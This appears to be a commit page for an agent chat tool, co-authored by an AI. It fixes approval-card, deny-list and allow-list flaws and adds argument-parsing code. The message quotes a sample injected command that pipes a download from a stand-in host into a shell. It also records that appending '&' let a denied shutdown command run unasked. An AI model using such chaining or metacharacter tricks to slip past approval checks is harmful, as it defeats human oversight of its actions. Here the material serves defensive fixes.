Four things that failed silently in an agent chat, and an account of the work
Each of the first four looked like it worked. That is what they have in
common, and why the tests are written against the property rather than the
markup.
**The job wrapper never cleaned up.** `jobs.py` interpolated `{log}` -- the
module logger -- where it meant `{logf}`, so every launch-and-wait wrapper
ended `rm -f ... <Logger ... (WARNING)> ...`, which is a shell syntax error.
It died after the sentinel, where nothing reads it, so commands still worked
while every one of them left four files on the far side forever, including
the log holding everything it printed. Every wrapper now goes through `sh -n`.
**The approval card could show something other than what ran.** The card did
a plain `json.loads` and showed `{}` on failure; `run_tool`'s own fallback
put the raw string into the tool's first required parameter, which for
`shell_run` is the command. So invalid JSON -- a normal path with small
models -- produced a card headed "Run a command" with an empty body, and
`policy.decide` was handed an empty command line matching neither list.
Arguments are parsed once now, in `tools.parse_arguments`, and the same dict
reaches the card, the policy and the runner.
**One character walked past the deny list.** `subject()` yields nothing for a
command line carrying a metacharacter, which is what stops `git *` also
meaning `git status; curl evil.test | sh`. The note said a deny list needed
no such care because failing open returns you to the mode -- true of Manual,
Edit and Plan, and false of Auto, where the mode is ALLOW. `shutdown -h now`
asked; `shutdown -h now &` ran.
**"Always allow this" allowed nothing.** The verdict was accepted, treated as
permitted, and stored nowhere. It now writes `Chat.scope_json["allow"]`, from
patterns derived server-side from the approved item -- the endpoint takes an
id and a verdict and nothing else -- and the list is shown in the scope menu
with a Clear beside it.
Two more found while fixing them:
**A reply could grow its request past the window with nothing watching.**
Compaction runs once, before the first round. The only other guard defaults
to a megabyte, larger than the window of nearly every model this talks to.
`_too_big` stops between rounds now, and the estimate it reads is recomputed
per round rather than once -- which is also what the metrics report on every
endpoint that sends no usage block.
**The harness ceiling was dropping AGENTS.md.** 8000 characters, against
~7,900 of fragments plus the 2,000 and 4,000 the index and instruction
budgets grant by default. `assemble` cuts the tail, so on a default install
the project listing was severed and the project's own instructions never
reached the model at all.
And, because an agent that works for ten minutes should be readable while it
does:
**Every action says what it is for.** `shell_run`, `file_write`, `file_edit`
and `job_stop` take a `why`: one line, carried onto the approval card above
the command and into the transcript's summary line rather than its collapsed
body. Auto mode is the case it exists for -- nothing stops for approval
there, so without it a reader watches a list of commands with no account of
any of them until the reply ends. Kept apart from the reason *we* stopped: an
explanation a reader takes for the application's own would be LLeMbas
vouching for text a model wrote.
**And the reply says what it is doing as it goes.** `core.objective` and
`core.narrate`, both agent-only. The second is deliberately the opposite of
`core.tools_preamble`'s "do not announce that you are about to", which is
right for a short answer -- read once it is finished -- and wrong for a long
piece of work, which is watched while it runs. It says so in its own words
rather than referring to a fragment an administrator may have cleared.
Co-Authored-By: Claude Opus 5 (1M context) <noreply@anthropic.com>
This commit is contained in:
co-authored by
Claude Opus 5
parent
a9aa89b2c1
commit
b03dfa24fd
@@ -1145,6 +1145,33 @@ def scoped_skills_off(chat: Chat | None) -> frozenset[str]:
|
||||
return frozenset(str(name) for name, on in wanted.items() if on is False)
|
||||
|
||||
|
||||
def scoped_allow(chat: Chat | None) -> tuple[str, ...]:
|
||||
"""Actions this chat has been told to stop asking about.
|
||||
|
||||
The one key under `scope_json` that *widens* rather than narrows, and it is
|
||||
worth being explicit about why that does not break the rule beside it. That
|
||||
rule governs which tools a chat may reach, where a crafted POST turning
|
||||
something on would reach past gates the model's capabilities and the
|
||||
reader's permissions had already closed. This is a different axis: every
|
||||
tool here was offered already, and what is recorded is only whether the
|
||||
reader is asked again before it runs.
|
||||
|
||||
What makes it safe is that **no pattern ever comes from a request**. Each
|
||||
entry is derived server-side in `api/chats.py:answer_interaction` from an
|
||||
item a person has just approved on a card, through `policy.subject` -- the
|
||||
same normaliser the matcher uses, so what is stored is exactly what will be
|
||||
compared, and it refuses to produce anything at all for a command line
|
||||
carrying a shell metacharacter. "Always" can therefore only ever mean "this
|
||||
exact thing again".
|
||||
"""
|
||||
if chat is None:
|
||||
return ()
|
||||
wanted = (getattr(chat, "scope_json", None) or {}).get("allow") or []
|
||||
if not isinstance(wanted, list):
|
||||
return ()
|
||||
return tuple(str(entry) for entry in wanted if str(entry).strip())
|
||||
|
||||
|
||||
def enabled_tools(db: DBSession, chat: Chat, user: User | None) -> list[dict[str, Any]]:
|
||||
"""The tool schemas to offer for this chat.
|
||||
|
||||
@@ -1175,7 +1202,45 @@ def context_for(
|
||||
)
|
||||
|
||||
|
||||
async def run_tool(context: ToolContext, name: str, arguments: str) -> ToolOutcome:
|
||||
def parse_arguments(tool: ToolDef | None, raw: str) -> dict[str, Any]:
|
||||
"""One tool call's arguments, as a dict, however badly they were spelled.
|
||||
|
||||
**The only place a call's arguments are interpreted.** It used to live
|
||||
inside `run_tool`, while the approval card had its own plain `json.loads`
|
||||
that returned `{}` on failure -- so a model emitting malformed JSON got a
|
||||
card headed "Run a command" with an empty body, while the fallback below
|
||||
handed the raw string to `shell_run` as its command and ran it. The card
|
||||
showed one thing and the machine did another, and `policy.decide` was
|
||||
handed an empty command line it could match against neither list.
|
||||
|
||||
So the loop parses once and the same dict reaches the card, the policy and
|
||||
the runner. Callers that only have a name resolve the `ToolDef` first; a
|
||||
`None` tool still parses valid JSON, which is what an unknown name needs.
|
||||
"""
|
||||
try:
|
||||
parsed = json.loads(raw) if raw.strip() else {}
|
||||
except json.JSONDecodeError:
|
||||
# Small models emit malformed argument JSON often enough that this is a
|
||||
# normal path, not an exceptional one. Treat the whole string as the
|
||||
# tool's first argument rather than giving up: what it says is required,
|
||||
# else the first thing it declares, and only then a guess -- a schema
|
||||
# somebody else wrote need not have either.
|
||||
parameters = tool.parameters if tool is not None else {}
|
||||
properties = parameters.get("properties") or {}
|
||||
names = parameters.get("required") or list(properties) or ["query"]
|
||||
parsed = {str(names[0]): raw.strip()}
|
||||
if not isinstance(parsed, dict):
|
||||
return {"query": str(parsed)}
|
||||
return parsed
|
||||
|
||||
|
||||
async def run_tool(
|
||||
context: ToolContext,
|
||||
name: str,
|
||||
arguments: str,
|
||||
*,
|
||||
parsed: dict[str, Any] | None = None,
|
||||
) -> ToolOutcome:
|
||||
"""Execute one tool call.
|
||||
|
||||
Never raises. A tool that fails hands the model an explanation and lets it
|
||||
@@ -1187,6 +1252,11 @@ async def run_tool(context: ToolContext, name: str, arguments: str) -> ToolOutco
|
||||
chat was gated out of -- a family switched off for the model, a permission
|
||||
the reader does not have -- had it run anyway, because only the offer was
|
||||
ever filtered.
|
||||
|
||||
`parsed` is the arguments the caller has already interpreted. The generation
|
||||
loop passes it so that what a person approved is what runs; a caller with
|
||||
only the raw string gets the same result, because both go through
|
||||
`parse_arguments`.
|
||||
"""
|
||||
book = REGISTRY if context.tools is None else context.tools
|
||||
tool = book.get(name)
|
||||
@@ -1196,19 +1266,8 @@ async def run_tool(context: ToolContext, name: str, arguments: str) -> ToolOutco
|
||||
{"name": name, "status": "error", "error": "Unknown tool."},
|
||||
)
|
||||
|
||||
try:
|
||||
parsed = json.loads(arguments) if arguments.strip() else {}
|
||||
except json.JSONDecodeError:
|
||||
# Small models emit malformed argument JSON often enough that this is a
|
||||
# normal path, not an exceptional one. Treat the whole string as the
|
||||
# tool's first argument rather than giving up: what it says is required,
|
||||
# else the first thing it declares, and only then a guess -- a schema
|
||||
# somebody else wrote need not have either.
|
||||
properties = tool.parameters.get("properties") or {}
|
||||
names = tool.parameters.get("required") or list(properties) or ["query"]
|
||||
parsed = {str(names[0]): arguments.strip()}
|
||||
if not isinstance(parsed, dict):
|
||||
parsed = {"query": str(parsed)}
|
||||
if parsed is None:
|
||||
parsed = parse_arguments(tool, arguments)
|
||||
|
||||
try:
|
||||
return await tool.run(context, parsed)
|
||||
@@ -1354,9 +1413,11 @@ __all__ = [
|
||||
"context_for",
|
||||
"enabled_tools",
|
||||
"families",
|
||||
"parse_arguments",
|
||||
"registry",
|
||||
"resolve_tools",
|
||||
"run_tool",
|
||||
"scoped_allow",
|
||||
"tool_turn",
|
||||
]
|
||||
|
||||
|
||||
Reference in New Issue
Block a user